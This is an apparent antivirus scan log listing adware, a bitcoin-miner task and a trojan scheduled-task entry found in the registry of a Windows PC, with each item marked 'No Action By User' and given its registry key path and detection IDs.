PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{25C3FE4E-7C48-447D-BAC5-141069528E0A}, No Action By User, 1950, 260095, , , , , , 
PUP.Optional.SlimCleanerPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SlimCleaner Plus (Scheduled Scan - Marilyn), No Action By User, 1633, 334098, , , , , , 
PUP.Optional.SlimCleanerPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{8FB062A9-BD13-42B5-B65F-B285C09B088E}, No Action By User, 1633, 334098, , , , , , 
PUP.Optional.SlimCleanerPlus, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{8FB062A9-BD13-42B5-B65F-B285C09B088E}, No Action By User, 1633, 334098, , , , , , 
PUP.Optional.AppGraffiti, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\AppGraffiti, No Action By User, 1008, 190051, 1.0.49973, , ame, , , 
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\oka, No Action By User, 897, 770535, , , , , , 
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{DB61A594-DCB9-421A-A376-D887F795D957}, No Action By User, 897, 770535, , , , , , 
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{DB61A594-DCB9-421A-A376-D887F795D957}, No Action By User, 897, 770535, , , , , , 
PUP.Optional.SuperOptimizer, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}, No Action By User, 1658, 243667, 1.0.49973, , ame, , , 
PUP.Optional.Conduit, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\APPDATALOW\SOFTWARE\ConduitSearchScopes, No Action By User, 181, 236861, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\APPDATALOW\SOFTWARE\Crossrider, No Action By User, 502, 237370, 1.0.49973, , ame, , , 
PUP.Optional.PriceGong, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, No Action By User, 1535, 241946, 1.0.49973, , ame, , , 
PUP.Optional.TidyNetwork, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\APPDATALOW\SOFTWARE\TidyNetwork, No Action By User, 159, 244063, 1.0.49973, , ame, , , 
PUP.Optional.InstallCore, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\CSASTATS\ic, No Action By User, 498, 586068, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\INSTALLEDBROWSEREXTENSIONS\VisualBee, No Action By User, 502, 237479, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}, No Action By User, 502, 237488, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{ABFC64F0-D9E3-43A6-9927-45B868125E5D}, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}, No Action By User, 502, 237486, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY\AUDIO\POLICYCONFIG\PROPERTYSTORE\e51541fd_0, No Action By User, 1335, 260411, 1.0.49973, , ame, , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{786CACE0-4B52-4B5E-9B22-4A8063236C63}, No Action By User, 228, 182757, , , , , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{786CACE0-4B52-4B5E-9B22-4A8063236C63}, No Action By User, 228, 182757, , , , , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{786CACE0-4B52-4B5E-9B22-4A8063236C63}, No Action By User, 228, 182757, 1.0.49973, , ame, , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}, No Action By User, 5070, 185435, , , , , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}, No Action By User, 5070, 185435, , , , , , 
PUP.Optional.Inbox, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C04B7D22-5AEC-4561-8F49-27F6269208F6}, No Action By User, 5070, 185435, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{F48980A0-589B-49F1-A35C-E7FF0B3C1B87}, No Action By User, 268, 258187, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{F48980A0-589B-49F1-A35C-E7FF0B3C1B87}, No Action By User, 268, 258187, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{F48980A0-589B-49F1-A35C-E7FF0B3C1B87}, No Action By User, 268, 258187, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKLM\SOFTWARE\Essentware, No Action By User, 1335, 384759, 1.0.49973, , ame, , , 
PUP.Optional.SuperOptimizer, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}, No Action By User, 1658, 243667, 1.0.49973, , ame, , , 
PUP.Optional.Conduit, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\APPDATALOW\SOFTWARE\ConduitSearchScopes, No Action By User, 181, 236861, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\APPDATALOW\SOFTWARE\Crossrider, No Action By User, 502, 237370, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, No Action By User, 764, 240486, 1.0.49973, , ame, , , 
PUP.Optional.PriceGong, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, No Action By User, 1535, 241946, 1.0.49973, , ame, , , 
PUP.Optional.TidyNetwork, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\APPDATALOW\SOFTWARE\TidyNetwork, No Action By User, 159, 244063, 1.0.49973, , ame, , , 
PUP.Optional.Toolbar.Generic, HKLM\SOFTWARE\CLASSES\APPID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}, No Action By User, 5831, 549624, , , , , , 
PUP.Optional.Toolbar.Generic, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}, No Action By User, 5831, 549624, , , , , , 
PUP.Optional.Toolbar.Generic, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}, No Action By User, 5831, 549624, , , , , , 
PUP.Optional.Toolbar.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{628F3201-34D0-49C0-BB9A-82A26AEFB291}, No Action By User, 5831, 549624, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054E672-778C-4582-94E9-56A07B85591C}, No Action By User, 502, 237509, , , , , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}, No Action By User, 502, 237509, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{A37804E0-4C35-486F-9197-5B486DAF6AA6}, No Action By User, 502, 237510, , , , , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}, No Action By User, 502, 237510, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{B353D28D-147E-47C1-9A5C-07A62DD50861}, No Action By User, 502, 237508, , , , , , 
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}, No Action By User, 502, 237508, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\APPDATALOW\SOFTWARE\TotalRecipeSearch_14, No Action By User, 764, 240526, 1.0.49973, , ame, , , 
PUP.Optional.MyWebSearch, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{B0441A0E-A49A-4E16-AFC1-74ECCED1921F}, No Action By User, 4645, 241108, , , , , , 
PUP.Optional.MyWebSearch, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{b0441a0e-a49a-4e16-afc1-74ecced1921f}, No Action By User, 4645, 241108, 1.0.49973, , ame, , , 
PUP.Optional.SuperOptimizer, HKU\S-1-5-18\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}, No Action By User, 1658, 243667, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\MySearchDial, No Action By User, 108, 241086, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\RecipeHub_2j, No Action By User, 764, 240799, 1.0.49973, , ame, , , 
PUP.Optional.SuperOptimizer, HKLM\SOFTWARE\WOW6432NODE\{1146AC44-2F03-4431-B4FD-889BC837521F}, No Action By User, 1658, 243671, 1.0.49973, , ame, , , 
PUP.Optional.SuperOptimizer, HKLM\SOFTWARE\WOW6432NODE\{6791A2F3-FC80-475C-A002-C014AF797E9C}, No Action By User, 1658, 243672, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKLM\SOFTWARE\ESSENTWARE\PCKeeper, No Action By User, 1335, 260412, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, No Action By User, 108, 241083, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}, No Action By User, 108, 241083, 1.0.49973, , ame, , , 
PUP.Optional.SearchManager, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\pilplloabdedfmialnfchjomjmpjcoej, No Action By User, 434, 260991, 1.0.49973, , ame, , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}, No Action By User, 228, 182758, , , , , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}, No Action By User, 228, 182758, , , , , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}, No Action By User, 228, 182758, , , , , , 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}, No Action By User, 228, 182758, , , , , , 
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}, No Action By User, 228, 182758, , , , , , 
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}, No Action By User, 228, 182758, 1.0.49973, , ame, , , 
PUP.Optional.ByteFence, HKLM\SOFTWARE\MICROSOFT\TRACING\ByteFence_RASAPI32, No Action By User, 1068, 823187, 1.0.49973, , ame, , , 
PUP.Optional.ByteFence, HKLM\SOFTWARE\MICROSOFT\TRACING\ByteFence_RASMANCS, No Action By User, 1068, 823187, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKLM\SOFTWARE\MICROSOFT\TRACING\PCKeeper_RASAPI32, No Action By User, 1335, 241577, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKLM\SOFTWARE\MICROSOFT\TRACING\PCKeeper_RASMANCS, No Action By User, 1335, 241577, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7158081D-DF25-4E71-BC14-844441C6B587}, No Action By User, 108, 332361, 1.0.49973, , ame, , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A26E4F53-0C1D-47E6-93D4-2B1380751BD0}, No Action By User, 5648, 430791, 1.0.49973, , ame, , , 
PUP.Optional.AppGraffiti, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\AppGraffiti, No Action By User, 1008, 190051, 1.0.49973, , ame, , , 
PUP.Optional.SuperOptimizer, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}, No Action By User, 1658, 243667, 1.0.49973, , ame, , , 
PUP.Optional.Conduit, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\APPDATALOW\SOFTWARE\ConduitSearchScopes, No Action By User, 181, 236861, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\APPDATALOW\SOFTWARE\Crossrider, No Action By User, 502, 237370, 1.0.49973, , ame, , , 
PUP.Optional.PriceGong, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, No Action By User, 1535, 241946, 1.0.49973, , ame, , , 
PUP.Optional.TidyNetwork, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\APPDATALOW\SOFTWARE\TidyNetwork, No Action By User, 159, 244063, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}, No Action By User, 502, 237488, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{ABFC64F0-D9E3-43A6-9927-45B868125E5D}, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}, No Action By User, 502, 237486, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY\AUDIO\POLICYCONFIG\PROPERTYSTORE\e51541fd_0, No Action By User, 1335, 260411, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{4AAD6DF8-F7F8-4E3E-91A5-B7C706FA8A12}, No Action By User, 268, 258187, 1.0.49973, , ame, , , 
PUP.Optional.TidyNetwork, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TidyNetwork_RASAPI32, No Action By User, 159, 256465, 1.0.49973, , ame, , , 
PUP.Optional.TidyNetwork, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TidyNetwork_RASMANCS, No Action By User, 159, 256465, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark.Generic, HKLM\SOFTWARE\WOW6432NODE\MOZILLAPLUGINS\@ei.TotalRecipeSearch_14.com/Plugin, No Action By User, 1833, 391319, 1.0.49973, , ame, , , 
PUP.Optional.AppGraffiti, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\AppGraffiti, No Action By User, 1008, 190051, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Essentware, No Action By User, 1335, 384779, 1.0.49973, , ame, , , 
PUP.Optional.InstallCore, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\ICSW1.23, No Action By User, 498, 239562, 1.0.49973, , ame, , , 
PUP.Optional.InstallCore, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\InstallCore, No Action By User, 498, 239563, 1.0.49973, , ame, , , 
PUP.Optional.SuperOptimizer, HKU\S-1-5-19\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}, No Action By User, 1658, 243667, 1.0.49973, , ame, , , 
PUP.Optional.SuperOptimizer, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}, No Action By User, 1658, 243667, 1.0.49973, , ame, , , 
PUP.Optional.Conduit, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\APPDATALOW\SOFTWARE\ConduitSearchScopes, No Action By User, 181, 236861, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\APPDATALOW\SOFTWARE\Crossrider, No Action By User, 502, 237370, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, No Action By User, 764, 240486, 1.0.49973, , ame, , , 
PUP.Optional.PriceGong, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, No Action By User, 1535, 241946, 1.0.49973, , ame, , , 
PUP.Optional.TidyNetwork, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\APPDATALOW\SOFTWARE\TidyNetwork, No Action By User, 159, 244063, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\APPDATALOW\SOFTWARE\TotalRecipeSearch_14, No Action By User, 764, 240526, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\ESSENTWARE\PCKeeper, No Action By User, 1335, 260410, 1.0.49973, , ame, , , 
PUP.Optional.SearchManager, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\pilplloabdedfmialnfchjomjmpjcoej, No Action By User, 434, 183362, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{7054e672-778c-4582-94e9-56a07b85591c}, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{a37804e0-4c35-486f-9197-5b486daf6aa6}, No Action By User, 502, 237488, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{ABFC64F0-D9E3-43A6-9927-45B868125E5D}, No Action By User, 502, 237487, 1.0.49973, , ame, , , 
PUP.Optional.CrossRider, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{b353d28d-147e-47c1-9a5c-07a62dd50861}, No Action By User, 502, 237486, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY\AUDIO\POLICYCONFIG\PROPERTYSTORE\e51541fd_0, No Action By User, 1335, 260411, 1.0.49973, , ame, , , 
PUP.Optional.MyWebSearch, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{cca2e567-1987-4100-a3c6-5b4267084510}, No Action By User, 4645, 241108, 1.0.49973, , ame, , , 
PUP.Optional.InstallCore, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\PRODUCTSETUP, No Action By User, 498, 481004, 1.0.49973, , ame, , , 
PUP.Optional.DriverUpdate, HKLM\SOFTWARE\WOW6432NODE\SlimWare Utilities, Inc.\DriverApp, No Action By User, 3479, 341522, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\esrv.mysearchdialESrvc.1, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B}, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\TYPELIB\{C292AD0A-C11F-479B-B8DB-743E72D283B0}, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{C292AD0A-C11F-479B-B8DB-743E72D283B0}, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{C292AD0A-C11F-479B-B8DB-743E72D283B0}, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\APPID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B}, No Action By User, 5952, 342422, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\esrv.mysearchdialESrvc, No Action By User, 5952, 342422, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\mysearchdial.mysearchdialappCore.1, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{C358B3D0-B911-41E3-A276-E7D43A6BA56D}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{C358B3D0-B911-41E3-A276-E7D43A6BA56D}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\mysearchdial.mysearchdialappCore, No Action By User, 5952, 342408, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\mysearchdial.mysearchdialdskBnd.1, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
